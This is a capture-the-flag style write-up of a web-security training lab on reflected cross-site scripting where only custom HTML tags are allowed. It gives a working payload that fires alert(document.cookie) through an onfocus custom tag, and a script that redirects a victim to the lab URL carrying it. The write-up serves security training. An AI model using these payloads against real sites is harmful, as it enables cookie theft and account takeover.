LAB 15 - Reflected XSS into HTML context with all tags blocked except custom ones¶

Initial instructions¶

This lab blocks all HTML tags except custom ones.¶

To solve the lab, perform a cross-site scripting attack that injects a custom tag and automatically alerts document.cookie.¶

To complete this lab I used the following XSS payload.

<custom-tag+onfocus%3D'alert(document.cookie)'+id%3D'x'+tabindex%3D"1">#x

So I entered this payload into the search parameter in the URL.

alt text

And it got triggered.

alt text

Now lets go to our exploit server and lets send the XSS to our victim.

alt text

So I built the following payload to deliver to the victim using location.

<script> location = 'https://0a7900a1032ff63a80f1539700cc0036.web-security-academy.net/?search=%3Ccustom-tag+onfocus%3D%27alert(document.cookie)%27+id%3D%27x%27+tabindex%3D%221%22%3E#x' </script>

alt text

And deliver exploit to the victim.

LAB 15 - Reflected XSS into HTML context with all tags blocked except custom ones¶

Initial instructions¶

This lab blocks all HTML tags except custom ones.¶

To solve the lab, perform a cross-site scripting attack that injects a custom tag and automatically alerts document.cookie.¶

Congratulations, you solved the lab!¶